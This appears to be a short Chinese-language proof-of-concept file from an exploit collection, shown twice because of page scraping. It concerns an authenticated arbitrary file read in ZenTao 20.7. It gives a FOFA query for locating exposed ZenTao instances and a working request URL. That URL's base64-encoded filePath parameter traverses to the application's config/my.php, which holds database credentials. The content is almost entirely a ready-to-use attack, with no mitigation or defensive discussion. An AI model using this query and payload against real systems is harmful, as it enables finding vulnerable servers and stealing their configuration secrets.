POC/wpoc/禅道/禅道20.7后台任意文件读取漏洞.md

# 禅道20.7后台任意文件读取漏洞

禅道20.7后台任意文件读取漏洞，只能读取网站目录下的文件

## fofa

```javascript
app="易软天创-禅道系统"
```

## poc

```javascript
http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
```

![image-20241028155218530](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410281552692.png)
first commit 2025-03-04 23:12:57 +08:00			`# 禅道20.7后台任意文件读取漏洞`

			`禅道20.7后台任意文件读取漏洞，只能读取网站目录下的文件`

			`## fofa`

			```javascript
			`app="易软天创-禅道系统"`
			```

			`## poc`

			```javascript
			`http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3`
			```

			`![image-20241028155218530](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410281552692.png)`